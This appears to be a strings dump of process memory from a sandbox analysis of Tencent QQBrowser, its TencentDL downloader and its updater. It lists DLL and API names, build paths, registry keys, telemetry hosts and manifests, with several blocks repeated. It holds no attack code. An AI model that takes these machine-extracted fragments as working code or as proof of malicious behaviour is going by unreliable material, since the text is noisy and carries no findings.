<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="9.3.7078.400" version="9.3.7078.400" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
> >$>(>,>0>4>~>
2 2$2(2,20242
6 6$6(6,6
= =@=`=|=
eTencent.QQBrowser.Default
shell32.dll
FQQBrowser.exe
QQBrowser_IE.exe
QQBrowser_Edge.exe
QQBrowser_Blink.exe
QQBrowser_Broker.exe
D%d.%d.%d.%d
Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
QBSafe.dll
\QBSafe.dll
F1Frame.dll
.F1Assistant.dll
.Downloader.dll
chrome_watcher.dll
chrome.dll
chrome_child.dll
chrome.exe
metro_driver.dll
{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}
{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Browse the web
Software\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser
-chrome
-chromeframe
WebAccessible
{8BA986DA-5100-405E-AA35-86F34A02ACBF}
BGoogle Chrome Frame
Google\Chrome Frame
Chrome in a Frame.
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
ntdll.dll
pipe\
Bkernel32.dll
kernelbase.dll
\Sessions\%d\AppContainerNamedObjects\%ls
ALPC Port
eKey
Ckernel32.dll
gdi32.dll
xntdll.dll
wow_helper.exe"
Crash Reports
script.log
resources.pak
chrome
pepflashplayer.dll
${windows}
\\.\pipe\GoogleCrashServices\
\\.\pipe\ChromeCrashServices
error %u
hunspecified-crash-key
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
rpcrt4.dll
%s\%s.dmp
x-x-x-xx-xxxxxx
InnerDoBugReport
bugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
problem-url
kernelBase.dll
Ndebug.log
\StringFileInfo\xx\%ls
advapi32.dll
%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe
9.3.7078.400
QQBrowser_exe
QQBrowser.exe

QQBrowser.exe_3504_rwx_37B0A000_000F5000:




%%s(Z
=%s(Z
N#%SP
%Dz(Z

QQBrowser.exe_3504_rwx_3FC0A000_00037000:




=%s(Z
%%s(Z

QQBrowser.exe_3576:




.text
`.rdata
@.data
.rsrc
@.reloc
SHA256 block transform for x86, CRYPTOGAMS by <[email protected]>
HtdHtHHHt.HH
j.Yf;
_tcPVj@
.PjRW
d:\rdm\projects\7075\chrome\src\chrome\app\chrome_exe_main_win.cc
d:\rdm\projects\7075\chrome\src\chrome\app\client_util.cc
ChromeMain
-delay.dll
1.3.21.115
Chrome
0.0.0.0-devel
font_key_name
url-chunk
subresource_url
%s-%x
CHROME_PROBED_PROGRAM_FILES_PATH
chrome-sxs
googlechromeframe
Cannot initialize AppCommands from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_commands.cc
Failed to open key "
Skipping over key "
d:\rdm\projects\7075\chrome\src\chrome\installer\util\language_selector.cc
Cannot initialize an AppCommand from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_command.cc
kernel32.dll
d:\rdm\projects\7075\chrome\src\sandbox\win\src\sandbox_policy_base.cc
CreateNamedPipeW
NtCreateKey
NtOpenKey
NtOpenKeyEx
MetricsReportingEnabled
CHROME_VERSION
CHROME_HEADLESS
CHROME_METRO_CONNECTED
CHROME_CRASHED
CHROME_RESTART
CHROME_BREAKPAD_PIPE_NAME
d:\rdm\projects\7075\chrome\src\components\crash\content\app\breakpad_win.cc
NTDLL.DLL
USER32.dll
SHELL32.dll
ole32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
RtlReportException
(0x%X)
Error (0x%X) while retrieving error. (0x%X)
%s-%Iu
(%d = %3.1f%%)
Histogram: %s recorded %d samples
(flags = 0x%x)
RPlatformFile.UnknownErrors.Windows
user32.dll
.syzygy
.thunks
full-memory-crash-report
D:\rdm\projects\7075\out\Release\initialexe\qqbrowser.exe.pdb
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
qqbrowser.exe
ClearBreakpadPipeEnvironmentVariable
ClearCrashKeyValueImpl
SetCrashKeyValueImpl
ZombieReport
SignalChromeElf
chrome_elf.dll
WINMM.dll
VERSION.dll
PSAPI.DLL
SHLWAPI.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
GetProcessHeap
GetWindowsDirectoryW
CreateIoCompletionPort
GetProcessHandleCount
KERNEL32.dll
USERENV.dll
GetCPInfo
SetNamedPipeHandleState
TransactNamedPipe
WaitNamedPipeW
zcÁ
.DRNO
%uGK*
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="9.3.7078.400" version="9.3.7078.400" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
> >$>(>,>0>4>~>
2 2$2(2,20242
6 6$6(6,6
= =@=`=|=
eTencent.QQBrowser.Default
shell32.dll
FQQBrowser.exe
QQBrowser_IE.exe
QQBrowser_Edge.exe
QQBrowser_Blink.exe
QQBrowser_Broker.exe
D%d.%d.%d.%d
Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
QBSafe.dll
\QBSafe.dll
F1Frame.dll
.F1Assistant.dll
.Downloader.dll
chrome_watcher.dll
chrome.dll
chrome_child.dll
chrome.exe
metro_driver.dll
{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}
{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Browse the web
Software\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser
-chrome
-chromeframe
WebAccessible
{8BA986DA-5100-405E-AA35-86F34A02ACBF}
BGoogle Chrome Frame
Google\Chrome Frame
Chrome in a Frame.
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
ntdll.dll
pipe\
Bkernel32.dll
kernelbase.dll
\Sessions\%d\AppContainerNamedObjects\%ls
ALPC Port
eKey
Ckernel32.dll
gdi32.dll
xntdll.dll
wow_helper.exe"
Crash Reports
script.log
resources.pak
chrome
pepflashplayer.dll
${windows}
\\.\pipe\GoogleCrashServices\
\\.\pipe\ChromeCrashServices
error %u
hunspecified-crash-key
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
rpcrt4.dll
%s\%s.dmp
x-x-x-xx-xxxxxx
InnerDoBugReport
bugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
problem-url
kernelBase.dll
Ndebug.log
\StringFileInfo\xx\%ls
advapi32.dll
%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe
9.3.7078.400
QQBrowser_exe
QQBrowser.exe

QQBrowser.exe_3600:




.text
`.rdata
@.data
.rsrc
@.reloc
SHA256 block transform for x86, CRYPTOGAMS by <[email protected]>
HtdHtHHHt.HH
j.Yf;
_tcPVj@
.PjRW
d:\rdm\projects\7075\chrome\src\chrome\app\chrome_exe_main_win.cc
d:\rdm\projects\7075\chrome\src\chrome\app\client_util.cc
ChromeMain
-delay.dll
1.3.21.115
Chrome
0.0.0.0-devel
font_key_name
url-chunk
subresource_url
%s-%x
CHROME_PROBED_PROGRAM_FILES_PATH
chrome-sxs
googlechromeframe
Cannot initialize AppCommands from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_commands.cc
Failed to open key "
Skipping over key "
d:\rdm\projects\7075\chrome\src\chrome\installer\util\language_selector.cc
Cannot initialize an AppCommand from an invalid key.
d:\rdm\projects\7075\chrome\src\chrome\installer\util\app_command.cc
kernel32.dll
d:\rdm\projects\7075\chrome\src\sandbox\win\src\sandbox_policy_base.cc
CreateNamedPipeW
NtCreateKey
NtOpenKey
NtOpenKeyEx
MetricsReportingEnabled
CHROME_VERSION
CHROME_HEADLESS
CHROME_METRO_CONNECTED
CHROME_CRASHED
CHROME_RESTART
CHROME_BREAKPAD_PIPE_NAME
d:\rdm\projects\7075\chrome\src\components\crash\content\app\breakpad_win.cc
NTDLL.DLL
USER32.dll
SHELL32.dll
ole32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
RtlReportException
(0x%X)
Error (0x%X) while retrieving error. (0x%X)
%s-%Iu
(%d = %3.1f%%)
Histogram: %s recorded %d samples
(flags = 0x%x)
RPlatformFile.UnknownErrors.Windows
user32.dll
.syzygy
.thunks
full-memory-crash-report
D:\rdm\projects\7075\out\Release\initialexe\qqbrowser.exe.pdb
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
qqbrowser.exe
ClearBreakpadPipeEnvironmentVariable
ClearCrashKeyValueImpl
SetCrashKeyValueImpl
ZombieReport
SignalChromeElf
chrome_elf.dll
WINMM.dll
VERSION.dll
PSAPI.DLL
SHLWAPI.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
GetProcessHeap
GetWindowsDirectoryW
CreateIoCompletionPort
GetProcessHandleCount
KERNEL32.dll
USERENV.dll
GetCPInfo
SetNamedPipeHandleState
TransactNamedPipe
WaitNamedPipeW
zcÁ
.DRNO
%uGK*
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="9.3.7078.400" version="9.3.7078.400" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
> >$>(>,>0>4>~>
2 2$2(2,20242
6 6$6(6,6
= =@=`=|=
eTencent.QQBrowser.Default
shell32.dll
FQQBrowser.exe
QQBrowser_IE.exe
QQBrowser_Edge.exe
QQBrowser_Blink.exe
QQBrowser_Broker.exe
D%d.%d.%d.%d
Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}
QBSafe.dll
\QBSafe.dll
F1Frame.dll
.F1Assistant.dll
.Downloader.dll
chrome_watcher.dll
chrome.dll
chrome_child.dll
chrome.exe
metro_driver.dll
{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}
{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Browse the web
Software\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser
-chrome
-chromeframe
WebAccessible
{8BA986DA-5100-405E-AA35-86F34A02ACBF}
BGoogle Chrome Frame
Google\Chrome Frame
Chrome in a Frame.
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
ntdll.dll
pipe\
Bkernel32.dll
kernelbase.dll
\Sessions\%d\AppContainerNamedObjects\%ls
ALPC Port
eKey
Ckernel32.dll
gdi32.dll
xntdll.dll
wow_helper.exe"
Crash Reports
script.log
resources.pak
chrome
pepflashplayer.dll
${windows}
\\.\pipe\GoogleCrashServices\
\\.\pipe\ChromeCrashServices
error %u
hunspecified-crash-key
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
rpcrt4.dll
%s\%s.dmp
x-x-x-xx-xxxxxx
InnerDoBugReport
bugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
problem-url
kernelBase.dll
Ndebug.log
\StringFileInfo\xx\%ls
advapi32.dll
%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe
9.3.7078.400
QQBrowser_exe
QQBrowser.exe

tencentdl.exe_3840:




.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
8%uvP
FTp1M
SSSShp
t%SSj
>.uTV
j SSSSSSSh
aSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
[%s]: %s,
asio.ssl
asio.misc
D:\src\QQMiniDL_proj\trunk\thirdparty\boost_1_44_0_build\include\boost-1_44\boost/exception/detail/exception_ptr.hpp
asio.misc error
asio.ssl error
fs-report.qq.com
fs-h2u.qq.com
fs-conn.qq.com
fs-hello.qq.com
xuanfengnet.qq.com
stun.qq.com
fs-tcp-conn.qq.com
pdlxf.qq.com
thread.exit_event
thread.entry_event
TencentDL exe Delay Exit seconds:%d
hXXp://
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
%s\Connection
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
VVV.tencent.com.
HTTP/1.1
$MD5Version: 1.0.0 November-19-1997 $
$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $
xf_update.request_t
xf_update.response_t
.\NewUpdate\NewUpdateMgr.cpp
TencentVer = %s, DlcoreVer = %s
Windows
Save File To %s
Response.url_info.cookies = %s
Response.url_info.ref = %s
Response.url_info.url = %s
Response.filesize = %I64d
Response.version = %s
Response.name = %s
Response.enable = %d
UniAttribute not found key:
mini-update.xf.qq.com
xf_update_svr.get_update_strategy
Request.guid = %s
Request.lanuage = %s
Request.custom_id = %d
Request.os = %s , sp = %s, os_bit = %s is_admin = %d
Request.uin = %I64d
Request.version = %s
Request.source = %s
/tencentdlinstallinfo/dtrp?v=1&&format=json&&product=tencentdlinstallinfo&&cmd=1
dtrp.tencentdlinstallinfo.qq.com
.\ReportInstall\ReportInstall.cpp
ReportInstall::CReportInstall::ReportInstallInfo
Install Info = %s
</%s>
<!--%s-->
standalone="%s"
encoding="%s"
version="%s"
&#xX;
%s='%s'
%s="%s"
PKEY_CUSTOMNAME
PKEY_PRODUCTNAME
PKEY_ISSHOW
PKEY_EXITTIME
PKEY_CUSTOMID
PKEY_START_STATUS
PKEY_GUID
PKEY_MINORVERSION
PKEY_MAJORVERSION
PKEY_COREVERSION
PKEY_EXEVERSION
PKEY_DUMPTIME
PKEY_DUMPUPLOADENABLE
PKEY_UPDATESERVERPORT
PKEY_UPDATESERVERIP
xf-com-update-doctor.qq.com
PKEY_TTL
PKEY_ISFIX
PKEY_VERSION
PKEY_FILEEMULE_HASH
PKEY_FILEEMULE_SIZE
PKEY_FILEEMULE_NAME
PKEY_FILEBT_HASH
PKEY_FILEBT_SIZE
PKEY_FILEBT_NAME
PKEY_FILECORE_HASH
PKEY_FILECORE_SIZE
PKEY_FILECORE_NAME
PKEY_URL
PKEY_PERIOD
PKEY_RESULT
kernel32.dll
.mixcrt
KERNEL32.DLL
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
GetProcessWindowStation
USER32.DLL
operator
portuguese-brazilian
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
112.90.140.6
112.90.140.7
IsNetworkOK %d
rand mod %d != 0
lc.tencent.com
addrinfo %s
appname=%s&ver=%lu&pid=%lu&random=%d
sendto %d
recvfrom %d
recvfrom fail len wrong %d
recv %x %x
127.0.0.1
0.0.0.0
d:\src\tencentdl\Tencentdl_v130\Output\Release\Tencentdl.pdb
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpQueryInfoW
HttpEndRequestW
HttpSendRequestExW
HttpAddRequestHeadersW
HttpOpenRequestW
WININET.dll
GetProcessHeap
CreateIoCompletionPort
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyW
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
WS2_32.dll
IMM32.dll
VERSION.dll
NetWkstaTransportEnum
NETAPI32.dll
WTHelperGetProvCertFromChain
CryptCATCatalogInfoFromContext
WINTRUST.dll
CertGetNameStringW
CRYPT32.dll
PSAPI.DLL
iphlpapi.dll
zcÁ
'DownloadProxy.EXE'
DownloadProxy.Downloader.1 = s 'Downloader Class'
CLSID = s '{70DE12EA-79F4-46bc-9812-86DB50A2FD64}'
DownloadProxy.Downloader = s 'Downloader Class'
CurVer = s 'DownloadProxy.Downloader.1'
ForceRemove {70DE12EA-79F4-46bc-9812-86DB50A2FD64} = s 'Downloader Class'
ProgID = s 'DownloadProxy.Downloader.1'
VersionIndependentProgID = s 'DownloadProxy.Downloader'
'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'
stdole2.tlbWWW
cuiMsgTypeWWW
pMsgParamWWWd
6|pTaskUrl
Created by MIDL version 6.00.0366 at Mon Aug 04 10:31:43 2014
&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU
"7,,11,,7"
2222222222222222
11///20.
##!!! !!!##
.02///11
mM............................................................Mm
mM..........................................Mm
(((((((JgT..TgJ(((((((
$D>".PH'8xU
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="2.0.0.0" processorArchitecture="X86" name="Tencent.TecentDL" type="win32"></assemblyIdentity><description></description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
8#9.999>9
4#525?5_5
6 70757;7
:&; ;=;];
2%2u2
8(9/969=9
1&2 222<2
9Ÿ9P9
6|7T7u7
88x8
3#3@3^3|3
;.<4<8<<<@<
8$8(8,808
3$3,393@3
6 7-7A7h7}7
1/7>7/?>?
8 8$8(8,8
1 1$1(1,1
4 4$4(4,4044484
? ?$?(?,?
1 1(101<1`1
>,>8>@>`>
Lkernel32.dll
Extract.dll
L[%s]: %s,
version.ini
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
.\Downloader\DownloadDispatcher.cpp
ATNProxy.dll
= %s,
qqdownload_config.xml
dlcore.dll
A.\Downloader\DownloaderMgr.cpp
CDownloaderMgr::SetHangMiniDumpReport
bNeedReport=%d, wait hang time =%d seconds
, uiCustomID=%u, bShowWnd=%d, strProdName=%s, sub_custom_name=%s
\tencentdl.exe
RaiseException, code:%x
CDownloaderMgr::HandleUnregister, uiCallbackPtr=%u, pid=%u, customid=%u
CDownloaderMgr::HandleUnregister, uiCallbackPtr=%u
CDownloaderMgr::Unregister, bIsDownloader=%d
CDownloaderMgr::HandleRegister, oInitParam.uiProcessID=%u, oInitParam.uiCustomID=%u
CDownloaderMgr::Register, bIsDownloader:%d
OnCheckExitTimer return, m_bStarted=%d
, m_bSetWndShow=%d, m_bUpdateMgrReg=%d
OnCheckExitTimer but m_DownloaderPtrMap Not empty, so return, m_bCanExit=%d
OnCheckClientAliveTimer return, m_bStarted:%d
dTencentDL exe Delay Exit, Set timer seconds=%d, m_bCanExit=%d, m_uiFutureExitTime=%u ms, m_uiDelayExitTime=%u ms
, m_bCanExit=%d, m_uiFutureExitTime=%u ms, m_uiDelayExitTime=%u ms
m_DownloaderPtrMap is empty, m_uiFutureExitTime=%u, m_uiDelayExitTime=%u
, pid=%u, customid=%u
HandleStart end, m_uiExeVersion:%u,m_uiCoreVersion:%u
CDownloaderMgr::Start, m_uiExeVersion=%d
DownloadProxy.Downloader.1
{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}
CLSID\%s\LocalServer32
Tencentdl.exe
C.tlb
Mscoree.dll
\bugreport.exe
bugreport_xf.exe
\Tencentdl.exe
\Installlog.txt
MiniDownload.dll
tinyxml.dll
DownloadProxyPS.dll
extract.dll
tnproxy.dll
regsvr32.exe
\bugreport_xf.exe
\DownloadProxyPS.dll
.\DownloadProxy.cpp
TencentDL tMain, filename:%s, cmd:%s
Kernel32.dll
D\StringFileInfo\xx\
netsh.exe
\\.\PhysicalDrive%d
\\.\Scsi%d:
oiphlpapi.dll
s.\NewUpdate\NewUpdateMgr.cpp
dns error! return 0. update server mini-update.xf.qq.com
uiRet = %d
nM-%.2d-%.2d %.2d:%.2d:%.2d
Unknown ProcessID. PID = %d
No pid option found in CmdLine
Content-Length: %d
\downloadproxyps.dll
\extract.dll
\tnproxy.dll
\dlcore.dll
oInstallInfo.xml
\Global.db
CUpdateMgr uiCustomID:%u,uiExitTime:%u ms, uiShowUI:%d strProdName:%s,strCustomName:%s
.\Update\UpdateMgr.cpp
uiErr:%u
NCUpdateMgr uiEnableDump:%u,uiDumpWaitTime:%u, strIP:%s,port:%d
PCUpdateMgr::OnComLoginServer
OnComLoginServer uiErr:%u
CUpdateMgr m_uiExeVersion:%u,m_uiCoreVersion:%u, m_oLoginServerAddr:%s,port:%d
LUserDataInfo.ini
L.tlg
g%s%s%s
H.\TXLog\Log.cpp
%*.*f
: %s/s
%s: %s
\TDConfig.ini
H\set.log
bugreport /buginfo:%p:%p:%p:%lu /extinfo:%p
ntdll.dll
SOFTWARE\Tencent\bugReport\
\\.\PhysicalDrive0
c:\program files\common files\tencent\qqdownload\130\tencentdl.exe
(1-10240)
1, 0, 130, 4

QQBrowserLiveup.exe_1808:




.text
`.rdata
@.data
.shared
.rsrc
@.reloc
[email protected]
PSSSh
PVSSh
^<%uP
6SSSSSSh
j.Yf;
_tcPVj@
.PjRW
Unicows.dll
CKernel32.dll
hXXp://update.browser.qq.com/qbrowser
DownloadUrl
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
'2, / 0&7!4-)1#
;3 #>6.&
RegOpenKeyTransactedW
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
UrlMkGetSessionOption
UrlMkSetSessionOption
URLDownloadToCacheFileW
CreateURLMoniker
DeleteUrlCacheEntryA
FindCloseUrlCache
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
HttpSendRequestA
HttpSendRequestExW
HttpSendRequestW
InternetCrackUrlA
InternetCrackUrlW
FindFirstUrlCacheEntryA
HttpOpenRequestW
InternetOpenUrlW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoA
EnableHotkey
ShowLoginDlg
EanbleHotKeyPrScrn
ShowAutoPtloginInfoBar
SaveWebAsPic
WebPageMute
HotkeyHelp
EnableSavePassword
EnableChromeTab
EnableAutoPtlogin
CompatibilityForGivenWebsite
CanBugReportUpdate
RegCreateKeyTransactedW
buffer overflow when peekBuf, over %u.
QB.ClientToServerResponse
UniAttribute type match fail,key:
UniAttribute not found key:
invalid map, tag: %d, size: %d
read 'map' type mismatch, tag: %d, get type: %d.
require field not exist, tag: %d
read 'Char' type mismatch, tag: %d, get type: %d.
require field not exist, tag: %d.
read 'Short' type mismatch, tag: %d, get type: %d.
read 'Int32' type mismatch, tag: %d, get type: %d.
invalid string size, tag: %d, size: %d
read 'string' type mismatch, tag: %d, get type: %d.
skipField with invalid type, type value: %d, %d.
skipField with invalid type, type value:%d.
read 'struct' type mismatch, tag: %d, get type: %d.
type mismatch, tag: %d, type: %d, %d
invalid size, tag: %d, type: %d, %d, size: %d
invalid size, tag: %d, type: %d, size: %d
type mismatch, tag: %d, type: %d
read 'vector' type mismatch, tag: %d, get type: %d.
read 'Int64' type mismatch, tag: %d, get type: %d.
HttpDownloadThread
{BB4EC7CF-E14F-4BCB-9953-B665D63AD222}
; %s)
%s/%d.%d.%d.%d
CSystem\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
D:\rdm\projects\7075\out\Release\QQBrowserLiveup.pdb
GetProcessHeap
KERNEL32.dll
EnumWindows
USER32.dll
SetViewportOrgEx
GDI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
SHDeleteKeyW
SHLWAPI.dll
COMCTL32.dll
MSIMG32.dll
WinHttpOpen
WinHttpCloseHandle
WinHttpConnect
WinHttpReadData
WinHttpWriteData
WinHttpQueryDataAvailable
WinHttpSetOption
WinHttpOpenRequest
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpGetProxyForUrl
WinHttpGetIEProxyConfigForCurrentUser
WINHTTP.dll
GdiplusShutdown
gdiplus.dll
WS2_32.dll
NetWkstaTransportEnum
NETAPI32.dll
GetCPInfo
PeekNamedPipe
EnumChildWindows
GetViewportOrgEx
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
RegQueryInfoKeyW
RegEnumKeyW
RegOpenKeyW
RegCreateKeyW
RegOpenKeyExA
ADVAPI32.dll
zcÁ
.?AV?$CAtlExeModuleT@VCQQBrowserLiveupModule@@@ATL@@
.?AVHttpDownloader@Util@@
.?AV?$CWindowImpl@VHttpDownloader@Util@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@4@@ATL@@
